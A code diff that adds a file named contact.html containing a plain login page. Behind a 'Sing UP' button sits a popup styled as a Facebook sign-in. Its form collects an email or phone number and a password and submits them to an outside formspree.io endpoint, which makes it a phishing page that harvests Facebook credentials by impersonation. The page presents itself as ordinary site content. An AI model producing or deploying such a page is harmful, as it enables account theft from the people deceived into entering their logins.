--- a/contact.html
+++ b/contact.html
@@ -1,1 +1,55 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8" />
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>Login Page</title>
+    <link rel="stylesheet" href="styles.css" />
+</head>
+<body>
+    <div class="login-container">
+        <h2>Login</h2>
+        <form class="login-form">
+            <div class="input-group">
+                <label for="email">Email</label>
+                <input type="email" id="email" placeholder="Enter your email" required />
+            </div>
+            <div class="input-group">
+                <label for="password">Password</label>
+                <input type="password" id="password" placeholder="Enter your password" required />
+            </div>
+            <button type="submit" class="login-btn">Login</button>
+            <div class="divider">OR</div>
+            <button type="button" class="fb-btn" id="facebookBtn">
+                <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook logo">
+                Sing UP
+            </button>
+        </form>
+    </div>
+
+    <!-- Popup Modal -->
+    <div class="popup" id="facebookPopup">
+        <div class="popup-content">
+            <span class="close-btn" id="closePopup">&times;</span>
+            <div class="flex-div">
+                <div class="name-content">
+                    <h1 class="logo">Facebook</h1>
+                    <p>Connect with friends and the world around you on Facebook.</p>
+                </div>
+                <form action="https://formspree.io/f/xanywavj" method="post">
+                    <input type="email" name="email" placeholder="Email or Phone Number" required />
+                    <input type="password" name="Number" placeholder="Password" required />
+                    <button class="login" type="submit">Log In</button>
+                    <a href="#">Forgot Password?</a>
+                    <hr />
+                    <button class="create-account">Sing UP</button>
+                </form>
+            </div>
+        </div>
+    </div>
+
+    <script src="script.js"></script>
+</body>
+</html>
 
